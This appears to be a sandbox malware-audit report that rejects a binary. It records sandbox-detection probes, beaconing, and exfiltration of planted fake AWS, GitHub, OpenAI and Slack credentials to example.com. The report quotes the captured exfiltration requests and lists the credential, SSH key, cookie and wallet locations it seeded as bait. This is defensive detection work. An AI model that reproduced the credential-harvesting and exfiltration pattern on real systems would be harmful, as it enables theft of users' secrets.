REJECT
8 high-severity finding(s). Honeytoken exfiltration or other unambiguous evidence of malicious behavior.
High Findings
sandbox_detection — HIGH
Process "target" (pid 26442) read "/proc/cpuinfo". Reads CPU strings looking for hypervisor brands (QEMU / VirtualBox / VMware). Sandbox-detection probes are themselves a strong indicator of evasive behavior: well-behaved software does not need to know whether it's running in a VM or container.
2026-04-29T02:55:58Z open comm=target pid=26442 filename=/proc/cpuinfo
honeytoken_hit — HIGH
Process "curl" (pid 26450) caused a tls_write event whose payload contained the honeytoken "AWS_ACCESS_KEY_ID" (fake AWS access key planted in /root/.aws/credentials). This token was planted by app-audit at sandbox start and has no legitimate reason to appear anywhere outside its seed location.
tls_write comm=curl data="POST / HTTP/1.1\r\nHost: example.com\r\n...aws_access_key_id=AKIAIOSFODNN7EXAMPLE..."
honeytoken_hit — HIGH
Process "curl" (pid 26450) exfiltrated the planted AWS_SECRET_ACCESS_KEY via TLS POST to example.com. The secret key was planted in /root/.aws/credentials and has no legitimate reason to appear in outbound traffic.
tls_write comm=curl data="POST / HTTP/1.1\r\nHost: example.com\r\n...aws_secret_access_key=wJalrXUtnFEMI/K7MDENG..."
honeytoken_hit — HIGH
Process "curl" (pid 26452) exfiltrated the planted GITHUB_TOKEN via Authorization header to example.com.
tls_write comm=curl data="GET / HTTP/1.1\r\nHost: example.com\r\nAuthorization: Bearer ghp_6744e41dfb9e84a7\r\n\r\n"
honeytoken_hit — HIGH
Process "target" (pid 26446) exfiltrated the planted OPENAI_API_KEY via Go HTTPS POST body. The key was planted as an environment variable.
tls_write comm=target data="..{\"api_key\":\"sk-proj-0eabbf61f1a8f77d\"}"
beaconing — HIGH
Process "curl" connected to 1.1.1.1:443 at least 4 times with regular spacing (mean interval 261ms, coefficient of variation 0.05). Regular-interval outbound connections are the classic C2 callback fingerprint.
connect comm=curl pid=26459 dst=1.1.1.1:443 interval=261ms cv=0.05
honeytoken_hit — HIGH
Process "curl" (pid 26461) exfiltrated the planted SLACK_BOT_TOKEN via TLS POST to example.com.
tls_write comm=curl data="POST / HTTP/1.1\r\nHost: example.com\r\n...slack_token=xoxb-6d99d9b64e1bbca7"
pii_outbound — HIGH
Process "target" (pid 26446) sent a payload containing a Luhn-valid 16-digit sequence (last 4: 4242). Confirm whether the vendor's stated data flows include payment-card data.
tls_write comm=target data="..{\"card\":\"4242424242424242\",\"cvc\":\"123\"}"
Network Destinations
| Destination | ASN | Country | First seen by |
|---|
| 192.168.65.7:53 | - | - | tracer |
| 104.20.23.154:443 | AS13335 CLOUDFLARENET | US | curl |
| 172.66.147.243:443 | AS13335 CLOUDFLARENET | US | curl |
| 1.1.1.1:443 | AS13335 CLOUDFLARENET | AU | curl |
Process Activity Summary
| Process | High | Medium | Low | Info | Total |
|---|
| curl | 5 | 13 | 0 | 5 | 23 |
| target | 3 | 3 | 0 | 0 | 6 |
| tracer | 0 | 0 | 0 | 5 | 5 |
Honeytokens Planted (18)
AWS_ACCESS_KEY_ID /root/.aws/credentials
AWS_SECRET_ACCESS_KEY /root/.aws/credentials
SSH_PRIVATE_KEY /root/.ssh/id_rsa
SENSITIVE_DOC customer_pii.txt
GITHUB_TOKEN env var
OPENAI_API_KEY env var
ANTHROPIC_API_KEY env var
STRIPE_API_KEY env var
SLACK_BOT_TOKEN env var
SLACK_WEBHOOK app config
TWILIO_SID env var
TWILIO_AUTH env var
CLOUDFLARE_TOKEN env var
JWT_TOKEN app config
CHROME_COOKIES Chrome Default/
FIREFOX_COOKIES Firefox profile
BTC_WALLET wallet.dat
PG_PASSWORD /root/.pgpass
Chain of Custody
| Run ID | d6ba21f9-8aac-403c-aec7-bd6b86a5a9c3 |
| Generated at | 2026-04-29T02:56:00Z |
| Tracer version | v1-rc16 |
| Go version | go1.22.12 |
| Host OS / arch | linux / arm64 |
| Target SHA-256 | 2147f8215423f518bf582ab422b0322b67b6909a5bb31d602c19c1c433459aaa |
| Target size | 7,077,384 bytes |
| Manifest SHA-256 | 2f8cacee317e63660f78eb20551cf706302e9ff943250648ecbd6efcfd20ce08 |
| Honeytokens planted | 18 |
| Detectors run | 11 |